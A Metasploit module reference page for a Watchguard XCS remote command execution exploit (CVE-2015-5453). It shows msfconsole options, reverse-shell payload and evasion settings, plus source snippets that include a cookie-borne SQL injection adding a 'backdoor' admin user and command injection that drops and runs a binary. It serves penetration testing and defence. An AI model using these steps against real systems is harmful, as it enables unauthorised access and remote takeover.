Watchguard XCS Remote Command Execution - Metasploit


This page contains detailed information about how to use the exploit/freebsd/http/watchguard_cmd_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Watchguard XCS Remote Command Execution
Module: exploit/freebsd/http/watchguard_cmd_exec
Source code: modules/exploits/freebsd/http/watchguard_cmd_exec.rb
Disclosure date: 2015-06-29
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): x64
Supported platform(s): BSD
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2015-5453

This module exploits two separate vulnerabilities found in the Watchguard XCS virtual appliance to gain command execution. By exploiting an unauthenticated SQL injection, a remote attacker may insert a valid web user into the appliance database, and get access to the web interface. On the other hand, a vulnerability in the web interface allows the attacker to inject operating system commands as the 'nobody' user.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


msf > use exploit/freebsd/http/watchguard_cmd_exec
msf exploit(watchguard_cmd_exec) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the freebsd/http/watchguard_cmd_exec exploit module looks in the msfconsole:

msf6 > use exploit/freebsd/http/watchguard_cmd_exec

[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(freebsd/http/watchguard_cmd_exec) > show info

       Name: Watchguard XCS Remote Command Execution
     Module: exploit/freebsd/http/watchguard_cmd_exec
   Platform: BSD
       Arch: x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-06-29

Provided by:
  Daniel Jensen <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Watchguard XCS 9.2/10.0

Check supported:
  Yes

Basic options:
  Name                 Current Setting  Required  Description
  ----                 ---------------  --------  -----------
  HTTPDELAY            10               yes       Time that the HTTP Server will wait for the payload request
  Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT                443              yes       The target port (TCP)
  SRVHOST              0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT              8080             yes       The local port to listen on.
  SSL                  true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI            /                yes       The target URI
  URIPATH                               no        The URI to use for this exploit (default is random)
  VHOST                                 no        HTTP server virtual host
  WATCHGUARD_PASSWORD  backdoor         yes       Web interface user password
  WATCHGUARD_USER      backdoor         yes       Web interface user account to add

Payload information:

Description:
  This module exploits two separate vulnerabilities found in the 
  Watchguard XCS virtual appliance to gain command execution. By 
  exploiting an unauthenticated SQL injection, a remote attacker may 
  insert a valid web user into the appliance database, and get access 
  to the web interface. On the other hand, a vulnerability in the web 
  interface allows the attacker to inject operating system commands as 
  the 'nobody' user.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2015-5453
  http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf

Module Options


This is a complete list of options available in the freebsd/http/watchguard_cmd_exec exploit:

msf6 exploit(freebsd/http/watchguard_cmd_exec) > show options

Module options (exploit/freebsd/http/watchguard_cmd_exec):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   HTTPDELAY            10               yes       Time that the HTTP Server will wait for the payload request
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                443              yes       The target port (TCP)
   SRVHOST              0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT              8080             yes       The local port to listen on.
   SSL                  true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI            /                yes       The target URI
   URIPATH                               no        The URI to use for this exploit (default is random)
   VHOST                                 no        HTTP server virtual host
   WATCHGUARD_PASSWORD  backdoor         yes       Web interface user password
   WATCHGUARD_USER      backdoor         yes       Web interface user account to add

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Watchguard XCS 9.2/10.0

Advanced Options


Here is a complete list of advanced options supported by the freebsd/http/watchguard_cmd_exec exploit:

msf6 exploit(freebsd/http/watchguard_cmd_exec) > show advanced

Module advanced options (exploit/freebsd/http/watchguard_cmd_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                               no        The executable template file name.
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   ListenerComm                                                                no        The specific communication channel to use for this service
   MSI::Custom                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                               no        The msi template file name
   MSI::UAC                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                               no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (generic/shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   ARCH                                         no        The architecture that is being targeted
   PLATFORM                                     no        The platform that is being targeted
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the freebsd/http/watchguard_cmd_exec module can exploit:

msf6 exploit(freebsd/http/watchguard_cmd_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Watchguard XCS 9.2/10.0

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the freebsd/http/watchguard_cmd_exec exploit:

msf6 exploit(freebsd/http/watchguard_cmd_exec) > show payloads

Compatible Payloads
===================

   #  Name                                     Disclosure Date  Rank    Check  Description
   -  ----                                     ---------------  ----    -----  -----------
   0  payload/bsd/x64/exec                                      normal  No     BSD x64 Execute Command
   1  payload/bsd/x64/shell_bind_ipv6_tcp                       normal  No     BSD x64 Command Shell, Bind TCP Inline (IPv6)
   2  payload/bsd/x64/shell_bind_tcp                            normal  No     BSD x64 Shell Bind TCP
   3  payload/bsd/x64/shell_bind_tcp_small                      normal  No     BSD x64 Command Shell, Bind TCP Inline
   4  payload/bsd/x64/shell_reverse_ipv6_tcp                    normal  No     BSD x64 Command Shell, Reverse TCP Inline (IPv6)
   5  payload/bsd/x64/shell_reverse_tcp                         normal  No     BSD x64 Shell Reverse TCP
   6  payload/bsd/x64/shell_reverse_tcp_small                   normal  No     BSD x64 Command Shell, Reverse TCP Inline
   7  payload/generic/custom                                    normal  No     Custom Payload
   8  payload/generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   9  payload/generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the freebsd/http/watchguard_cmd_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(freebsd/http/watchguard_cmd_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Could not inject command, may not be vulnerable


Here is a relevant code snippet related to the "Could not inject command, may not be vulnerable" error message:

81:	    print_good('Successfully logged in')
82:	
83:	    # Check if cmd injection works
84:	    test_cmd_inj = send_cmd_exec('/ADMIN/mailqueue.spl', 'id')
85:	    unless test_cmd_inj && test_cmd_inj.body.include?('uid=65534')
86:	      fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable')
87:	    end
88:	
89:	    # We have cmd exec, stand up an HTTP server and deliver the payload
90:	    vprint_status('Getting ready to drop binary on appliance')
91:	

Could not get login page.


Here is a relevant code snippet related to the "Could not get login page." error message:

106:	    get_login_hash = send_request_cgi({
107:	      'uri' => normalize_uri(target_uri.path, '/login.spl')
108:	    })
109:	
110:	    unless get_login_hash && get_login_hash.body
111:	      fail_with(Failure::Unreachable, 'Could not get login page.')
112:	    end
113:	
114:	    #Find the hash token needed to login
115:	    login_hash = ''
116:	    get_login_hash.body.each_line do |line|

Here is a relevant code snippet related to the "Could not find login hash or cookie" error message:

119:	      break
120:	    end
121:	
122:	    sid_cookie = (get_login_hash.get_cookies || '').scan(/sid=(\w+);/).flatten[0] || ''
123:	    if login_hash == '' || sid_cookie == ''
124:	      fail_with(Failure::UnexpectedReply, 'Could not find login hash or cookie')
125:	    end
126:	
127:	    login_post = {
128:	      'u' => "#{username}",
129:	      'pwd' => "#{pwd_clear}",

Could not connect to host


Here is a relevant code snippet related to the "Could not connect to host" error message:

156:	      'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
157:	      'cookie' => "sid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(#{user_id}, '#{username}', '#{pwd_hash}', 0, 'server_admin', 0, 0)--"
158:	    })
159:	
160:	    unless res && res.body
161:	      fail_with(Failure::Unreachable, "Could not connect to host")
162:	    end
163:	
164:	    if res.body.include?('ERROR:  duplicate key value violates unique constraint')
165:	      print_status("Added backdoor user, credentials => #{username}:#{pwd_clear}")
166:	    else

ERROR: duplicate key value violates unique constraint


Here is a relevant code snippet related to the "ERROR: duplicate key value violates unique constraint" error message:

159:	
160:	    unless res && res.body
161:	      fail_with(Failure::Unreachable, "Could not connect to host")
162:	    end
163:	
164:	    if res.body.include?('ERROR:  duplicate key value violates unique constraint')
165:	      print_status("Added backdoor user, credentials => #{username}:#{pwd_clear}")
166:	    else
167:	      fail_with(Failure::UnexpectedReply, 'Unable to add user to database')
168:	    end
169:	

Unable to add user to database


Here is a relevant code snippet related to the "Unable to add user to database" error message:

162:	    end
163:	
164:	    if res.body.include?('ERROR:  duplicate key value violates unique constraint')
165:	      print_status("Added backdoor user, credentials => #{username}:#{pwd_clear}")
166:	    else
167:	      fail_with(Failure::UnexpectedReply, 'Unable to add user to database')
168:	    end
169:	
170:	    true
171:	  end
172:	

Here is a relevant code snippet related to the "Missing a session cookie when attempting to execute command." error message:

181:	  end
182:	
183:	  def send_cmd_exec(uri, os_cmd, blocking = true)
184:	    #This is a handler function that makes HTTP calls to exploit the command injection issue
185:	    unless @sid
186:	      fail_with(Failure::Unknown, 'Missing a session cookie when attempting to execute command.')
187:	    end
188:	
189:	    opts = {
190:	      'uri' => normalize_uri(target_uri.path, "#{uri}"),
191:	      'cookie' => "sid=#{@sid}",

Failed to exploit command injection.


Here is a relevant code snippet related to the "Failed to exploit command injection." error message:

202:	      res = send_request_cgi(opts, 1)
203:	    end
204:	
205:	    #Handle cmd exec failures
206:	    if res.nil? && blocking
207:	      fail_with(Failure::Unknown, 'Failed to exploit command injection.')
208:	    end
209:	
210:	    res
211:	  end
212:	

Failed to login, attempting to add backdoor user...


Here is a relevant code snippet related to the "Failed to login, attempting to add backdoor user..." error message:

218:	
219:	    sid_cookie = attempt_login(username, pwd_clear)
220:	
221:	    return sid_cookie unless sid_cookie.nil?
222:	
223:	    vprint_error('Failed to login, attempting to add backdoor user...')
224:	    pwd_hash = generate_device_hash(pwd_clear)
225:	
226:	    unless add_user(user_id, username, pwd_hash, pwd_clear)
227:	      fail_with(Failure::Unknown, 'Failed to add user account to database.')
228:	    end

Failed to add user account to database.


Here is a relevant code snippet related to the "Failed to add user account to database." error message:

222:	
223:	    vprint_error('Failed to login, attempting to add backdoor user...')
224:	    pwd_hash = generate_device_hash(pwd_clear)
225:	
226:	    unless add_user(user_id, username, pwd_hash, pwd_clear)
227:	      fail_with(Failure::Unknown, 'Failed to add user account to database.')
228:	    end
229:	
230:	    sid_cookie = attempt_login(username, pwd_clear)
231:	
232:	    unless sid_cookie

Unable to login with user account.


Here is a relevant code snippet related to the "Unable to login with user account." error message:

228:	    end
229:	
230:	    sid_cookie = attempt_login(username, pwd_clear)
231:	
232:	    unless sid_cookie
233:	      fail_with(Failure::Unknown, 'Unable to login with user account.')
234:	    end
235:	
236:	    sid_cookie
237:	  end
238:	

Finished primer hook, raising Timeout::Error manually


Here is a relevant code snippet related to the "Finished primer hook, raising Timeout::Error manually" error message:

257:	
258:	    exec_cmd = "/tmp/#{filename}"
259:	    vprint_status('Running the payload...')
260:	    send_cmd_exec('/ADMIN/mailqueue.spl', exec_cmd, false)
261:	
262:	    vprint_status('Finished primer hook, raising Timeout::Error manually')
263:	    raise(Timeout::Error)
264:	  end
265:	
266:	  #Handle incoming requests from the server
267:	  def on_request_uri(cli, request)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Daniel Jensen <daniel.jensen[at]security-assessment.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.